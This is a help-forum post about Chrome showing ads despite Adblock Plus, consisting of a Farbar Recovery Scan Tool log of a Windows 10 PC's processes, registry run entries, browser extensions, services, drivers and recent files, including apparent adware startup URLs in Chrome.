Chrome shows ads despite ADBLOCK Plus being installed



Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 20-08-2017
Ran by dejan (administrator) on DEJAN-PC (27-08-2017 16:21:46)
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Platform: Microsoft Windows 10 Pro Version 1703 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
(Adobe Systems, Incorporated) C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(Digital Wave Ltd.) C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgemcx.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Copyright 2017.) C:\Program Files\Zemana AntiMalware\ZAM.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Facebook) C:\Users\dejan\AppData\Local\Facebook\Games\FacebookGameroom.exe
(The CefSharp Authors) C:\Users\dejan\AppData\Local\Facebook\Games\Facebook Gameroom Browser.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [485280 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [15111680 2017-02-10] (Realtek Semiconductor)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [Viber] => C:\Users\dejan\AppData\Local\Viber\Viber.exe [30676560 2017-05-06] (Viber Media S.à r.l.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7658200 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [4005944 2017-02-14] (Tonec Inc.)
Startup: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-08-26]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\dejan\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_131\bin\ssv.dll [2017-04-24] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-24] (Oracle Corporation)

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> about:start

FireFox:
========
FF ProfilePath: C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 [2017-08-27]
FF Homepage: Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 -> www.google.com
FF Extension: (Vlc context menu) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\vlcplaylist@helgatauscher.de.xpi [2017-05-28]
FF Extension: (VideoDownloadConverter) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\_4zMembers_@www.videodownloadconverter.com [2017-08-21]
FF Extension: (Video DownloadHelper) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-08-21]
FF Extension: (Adblock Plus) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-08-21]
FF Extension: (Firefox Screenshots) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\features\{48b193db-8667-41f3-b793-94688160f06f}\screenshots@mozilla.org.xpi [2017-08-27]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5 [2017-08-25] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)

Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.google.com/
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/","hxxp://www.youndoo.com/?z=61bcc231723f316e9912186g2z5b6teo2w2zazczaq&from=amz&uid=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&type=hp","hxxp://www.search.ask.com/?o=APN10640A&gct=hp&d=473-102&v=a12627-333&t=4","hxxp://www.initialsite123.com/?z=53e8deaf6335b4feab6622eg8z8t0g5mbw7q9b8w6o&from=icb&uid=HitachiXHDS721050CLA362_JPF521HA3EJ06V3EJ06VX&type=hp"
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-27] <==== ATTENTION
CHR Extension: (Google Translate) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-25]
CHR Extension: (Nice Day (weather)) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\akmijnhpfgblhkbdlnbldpmjgaiognoo [2017-08-25]
CHR Extension: (Google Docs) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-25]
CHR Extension: (Google Drive) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-25]
CHR Extension: (YouTube) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-25]
CHR Extension: (Adblock Plus) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-08-25]
CHR Extension: (Notifier for Gmail™) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\dcjichoefijpinlfnjghokpkojhlhkgl [2017-08-25]
CHR Extension: (SBRO Safe Browsing) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\eglegmheckaainhhlaiogafaecfgfbga [2017-08-25]
CHR Extension: (Tampermonkey BETA) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gcalenpjmijncebpfijmoaglllgpjagf [2017-08-25]
CHR Extension: (Google Docs Offline) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-25]
CHR Extension: (Image Search Options) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kljmejbpilkadikecejccebmccagifhl [2017-08-25]
CHR Extension: (IDM Integration Module) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-08-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-25]
CHR Extension: (Chrome NPAPI Replacement) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\okoafaojkokbmieeefnflkiklhanpeoc [2017-08-25]
CHR Extension: (Gmail) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-25]
CHR Extension: (Chrome Media Router) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-25]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2017-02-13]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [1002544 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgfws; C:\Program Files\AVG\Av\avgfws.exe [1458352 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [4153400 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [935184 2016-12-06] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [606352 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 DigitalWave.Update.Service; C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe [392168 2016-08-31] (Digital Wave Ltd.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2545848 2017-03-18] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [10883824 2017-03-17] (TeamViewer GmbH)
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [265352 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [82488 2017-06-20] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files\Zemana AntiMalware\ZAM.exe [14554768 2017-04-29] (Copyright 2017.)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AndnetBus; C:\WINDOWS\System32\drivers\lgandnetbus.sys [15744 2014-10-09] (LG Electronics Inc.)
S3 AndNetDiag; C:\WINDOWS\system32\DRIVERS\lgandnetdiag.sys [23680 2014-10-09] (LG Electronics Inc.)
S3 ANDNetModem; C:\WINDOWS\system32\DRIVERS\lgandnetmodem.sys [28416 2014-10-09] (LG Electronics Inc.)
S0 Avgbootx; C:\WINDOWS\System32\DRIVERS\avgbootx.sys [19584 2016-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [134912 2016-05-13] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\WINDOWS\system32\DRIVERS\avgfwd6x.sys [67336 2016-10-23] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\WINDOWS\System32\DRIVERS\avgidsdriverx.sys [259328 2017-03-23] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [207616 2016-10-05] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\system32\DRIVERS\avgidsshimw8x.sys [41216 2016-08-02] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [244992 2016-11-30] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [287008 2016-02-16] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [197376 2017-04-11] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [47360 2016-06-01] (AVG Technologies CZ, s.r.o.)
R0 avgunivx; C:\WINDOWS\System32\DRIVERS\avgunivx.sys [65280 2016-06-20] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpx; C:\WINDOWS\system32\DRIVERS\avgwfpx.sys [246536 2016-08-04] (AVG Technologies CZ, s.r.o.)
S3 dg_ksudbus; C:\WINDOWS\System32\drivers\ksudbus.sys [75776 2011-03-25] (Microsoft Corporation) [File not signed]
S3 HtcUsbMdmV32; C:\WINDOWS\system32\DRIVERS\HtcUsbMdmV32.sys [105984 2009-10-27] (QUALCOMM Incorporated)
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [170200 2017-08-08] (Malwarebytes)
S3 pneteth; C:\WINDOWS\System32\drivers\pneteth.sys [13440 2011-11-25] (June Fabrics Technology Inc.)
R0 pwdrvio; C:\WINDOWS\System32\pwdrvio.sys [17160 2015-03-05] ()
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [13064 2016-11-24] ()
S3 qcfilter; C:\WINDOWS\System32\drivers\qcusbfilter.sys [39456 2015-09-25] (QUALCOMM Incorporated)
S3 qcusbser; C:\WINDOWS\system32\DRIVERS\qcusbser.sys [214560 2015-09-25] (QUALCOMM Incorporated)
R3 rt640x86; C:\WINDOWS\System32\drivers\rt640x86.sys [795648 2017-02-20] (Realtek )
S3 usbbus; C:\WINDOWS\System32\drivers\lgusbbus.sys [13056 2014-05-27] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\system32\DRIVERS\lgusbdiag.sys [20864 2014-05-27] (LG Electronics Inc.)
S3 USBModem; C:\WINDOWS\system32\DRIVERS\lgusbmodem.sys [25216 2014-05-27] (LG Electronics Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37464 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [243104 2017-03-18] (Microsoft Corporation)
S3 wdf_usb; C:\WINDOWS\system32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 wdm_usb; C:\WINDOWS\System32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [96672 2017-03-18] (Microsoft Corporation)
S3 WUDFWpdMtp; C:\WINDOWS\System32\drivers\WUDFRd.sys [160256 2017-03-18] (Microsoft Corporation)
R1 ZAM; C:\WINDOWS\System32\drivers\zam32.sys [181496 2016-10-15] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard32.sys [181496 2016-10-15] (Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-27 16:21 - 2017-08-27 16:22 - 000018120 _____ C:\Users\dejan\Desktop\FRST.txt
2017-08-27 16:21 - 2017-08-27 16:21 - 000000258 _____ C:\Users\dejan\Desktop\Fixlog.txt
2017-08-26 23:52 - 2017-08-26 23:52 - 000001227 _____ C:\Users\dejan\Desktop\Facebook Gameroom.lnk
2017-08-26 23:52 - 2017-08-26 23:52 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2017-08-23 23:16 - 2017-08-23 23:16 - 001792512 _____ (Farbar) C:\Users\dejan\Desktop\FRST.exe
2017-08-21 21:37 - 2017-08-27 16:21 - 000000000 ____D C:\FRST
2017-08-13 22:40 - 2017-08-13 22:40 - 000260776 _____ (Facebook) C:\Users\dejan\Downloads\FacebookGameroom.exe
2017-08-09 22:03 - 2017-08-01 04:47 - 005862816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-09 22:03 - 2017-08-01 04:43 - 000273312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-09 22:03 - 2017-08-01 04:41 - 000095648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-09 22:03 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-08-09 22:03 - 2017-08-01 04:37 - 002023832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-08-09 22:03 - 2017-08-01 04:37 - 000582560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-08-09 22:03 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-08-09 22:03 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-08-09 22:03 - 2017-08-01 04:36 - 000173984 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-08-09 22:03 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-08-09 22:03 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-08-09 22:03 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-09 22:03 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-08-09 22:03 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-08-09 22:03 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-08-09 22:03 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-08-09 22:03 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2017-08-09 22:03 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-08-09 22:03 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-08-09 22:03 - 2017-08-01 04:11 - 000187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-08-09 22:03 - 2017-08-01 04:10 - 000905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-08-09 22:03 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 003447296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 001585152 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-08-09 22:03 - 2017-08-01 04:06 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000236032 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 001831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-08-09 22:03 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-08-09 22:03 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjet40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswdat10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswstr10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrepl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\system32\msjetoledb40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd3x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msexcl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd2x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjtes40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstext40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\msltus40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjint40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjter40.dll
2017-08-09 22:02 - 2017-08-01 04:34 - 000060312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
2017-08-09 22:02 - 2017-08-01 04:20 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
